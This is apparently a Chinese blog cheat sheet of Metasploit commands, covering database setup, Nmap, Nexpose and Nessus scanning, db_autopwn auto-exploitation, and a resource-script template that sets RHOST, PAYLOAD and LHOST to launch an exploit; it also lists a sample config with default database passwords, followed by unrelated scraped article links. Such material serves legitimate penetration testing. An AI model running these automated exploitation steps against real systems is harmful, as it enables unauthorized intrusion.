metasploit 常用命令汇总
1.连接数据并显示一些信息
db_connet username:password@ip address/database name
db_destroy 同上
db_import 文件名字
db_hosts -c address,svcs,vulns // 显示ip地址,服务器,漏洞数
db_vlns // 显示漏洞名字
2.nmap扫描
db_nmap -sS -nP ip address
db_nmap -h
3.nexpose在metasploit的使用
load nexpose // 加载nexpose插件
nexpose -h
nexpose_connect 用户名:密码@ip地址:端口号 认证字符
nexpose_scan ip地址
db_hosts -c address // 显示漏洞信息
4.nessus在metasploit的使用
load nessus
nessus_connect 用户名:密码@ip地址:端口号 认证字符
nessus_policy_list //显示策略列表
nessus_scan_new
nessus_scan_new 2 bridge_scan ip地址
nessus_scan_status //显示状态
nessus_report_list // 报告列表
nessus_report_get 报告名字 // 显示报告
db_hosts -c address,svcs,vlns
db_autopwn -e -t -r -x -p // 自动运行检测数据库中得到的漏洞
5.搜索漏洞
search mysql // 搜索mysql的漏洞
6.保存metasploit用过的命令到文件
makerc 路径/文件名字
自动审计,运行检测
7.脚本如下
echo use 漏洞名字 >autoexploit.rc
echo set RHOST IP地址 >> autoexploit.rc
echo set PAYLOAD shellcode名字 >> autoexploit.rc
echo set LHOST IP地址 >> autoexploit.rcecho exploit >> autoexploit.rc
8.第1种运行脚本的方法:
msfconsole -r autoexploit.rc
9.第2种运行脚本的方法:
msfconsole
resource autoexploit.rc
10.配置文件说明
<1>.metasploit的全局配置文件在安装目录下,文件名为properties.ini
<2>.properties.ini的信息如下:
[General] // metasploit通用设置栏
base_stack_name=Metasploit
base_stack_version=4.3.0
installdir=D:\metasploit //matasploit 安装路径
[Postgres] // postgresql数据库栏
postgres_binary_directory=D:\metasploit/postgresql/bin //postgresql数据库bin路径
postgres_port=7337 //postgresql数据库的端口号
postgres_root_directory=D:\metasploit/postgresql //postgresql数据库的数据目录
postgres_root_password=b83a7446 //postgresql数据库的默认账户为postgres,默认密码就是此栏
postgres_unique_service_name=metasploitPostgreSQL-1 //postgresql数据库的服务名
rapid7_database_password=20f25188
rapid7_database_user=msf3 //postgresql数据库中的新建的账号为msf3,密码为20f25188
[Ruby]
ruby_root_directory=D:\metasploit/ruby // ruby的安装目录
[NginX] // nginx服务器设置
nginx_ssl_days=3650
nginx_ssl_name=goodjob-PC
nginx_ssl_port=3790 // nginx服务器的端口号
metasploit 常用命令汇总的更多相关文章
- 20145222《信息安全系统设计基础》Linux常用命令汇总
学习Linux时常用命令汇总 通过Ctrl+f键可在该网页搜索到你想要的命令. Linux中命令格式为:command [options] [arguments] //中括号代表是可选的,即有些命令不 ...
- Oozie命令行常用命令汇总[转]
Oozie命令行常用命令汇总 有时候脚本跑多了就不愿意在OozieWeb端去看脚本的运行情况了.还好Oozie提供了很多命令行命令.能通过命令行直接检索自己想看到的脚本信息.在这里简单进行一下总结.一 ...
- vim常用命令汇总
vim常用命令汇总: http://www.cnblogs.com/softwaretesting/archive/2011/07/12/2104435.html 定位 本行第一个字符 ctrl+$ ...
- metasploit 常用命令备忘
metasploit 常用命令备忘 MSFconsole Commands-------------------------------------24show exploits 查看所有exp ...
- 【Linux】Linux 常用命令汇总
查看软件xxx安装内容:dpkg -L xxx 查找软件库中的软件:apt-cache search 正则表达式 查找软件库中的软件:aptitude search 软件包 查找文件属于哪个包:dpk ...
- Docker笔记:常用命令汇总
Docker常用命令汇总 启动服务 [root@localhost ~]# service docker start Redirecting to /bin/systemctl start docke ...
- [svc][op]vim常用命令汇总
vim常用命令汇总: 定位 本行第一个字符 ctrl+$ 本行最后一个字符 0gg 文章首行 ctrl+G 文章行尾 u 撤销(Undo) 删除 D 从当前位置删除到行尾 ("d$" ...
- 【Ubuntu】常用命令汇总,整理ing
Ubuntu 常用命令(在此页面中Ctrl+F即可快速查找) 在Ubuntu系统使用过程中,会不断地接触到命令行操作,下面对一些常用的命令进行汇总,方便查找. 1.文件操作 1.1 文件复制拷贝 cp ...
- Linux常用命令汇总及使用方法(二)之文本编辑器VI
VI可能是在Linux中使用比较频繁的文本编辑器,如果不能熟练使用VI,在一定程度上会影响工作效率,所以在这里记录一下VI的常用命令及操作方式 在[root@test ~]# vi carrie.tx ...
随机推荐
- Android activity_main.xml删除边缘距离,充满屏幕
删除android:paddingBottom.android:paddingLeft.android:paddingRight和android:paddingTop四个属性
- WebSocket技术
webSocket技术 在html5技术革新中,加入了WebSocket技术 1.webSocket实际是TCP连接 webSocket在最初将发送http连接请求到服务器端, 但是在header中加 ...
- Windows环境下配置Vim为Python的IDE
(一)安装Python 2.7 在官网下载Python,并安装,我的安装路径是D:\Program Files\Python.安装完成后编辑环境变量Path,在其后添加;D:\Program File ...
- java 小知识点
1.转Java中Vector和ArrayList的区别 首先看这两类都实现List接口,而List接口一共有三个实现类,分别是ArrayList.Vector和LinkedList.List用于存 ...
- Java Hour 23 Networking
有句名言,叫做10000小时成为某一个领域的专家.姑且不辩论这句话是否正确,让我们到达10000小时的时候再回头来看吧. 首先拟好主题,做到心中有数,再去写内容. socket public stat ...
- Codeforces Codeforces Round #316 (Div. 2) C. Replacement set
C. Replacement Time Limit: 20 Sec Memory Limit: 256 MB 题目连接 http://codeforces.com/contest/570/proble ...
- WinForm下窗体标题栏上有“帮助”按钮
将FormBorderStyle设置为Sizable. 最大化和最小化设置为false helpbutton 设置为true
- 【web JSP basePath】basePath的含义
问题1:WEB-INF的问题 今天新创建项目,在JSP中引入外部的JS文件和CSS文件,但是路径一直显示错误: 其中JSP页面引入这几个文件是这么写的: <link rel="styl ...
- diff和common
diff 命令 diff命令:找出两个文件的不同点,用于比较文件的差异 linux上非常重要的工具,一般用于制作补丁文件,特别是比较两个版本不同的文件以找到改动的地方. diff在命令行中打印每一个行 ...
- Xamarin.Forms项目无法添加服务引用
Xamarin.Forms项目无法添加服务引用 创建的Xamarin.Forms项目中,右击“引用”选项,在弹出的菜单中没有“添加服务引用”命令.这是由于该项目是支持Windows Phone 8.1 ...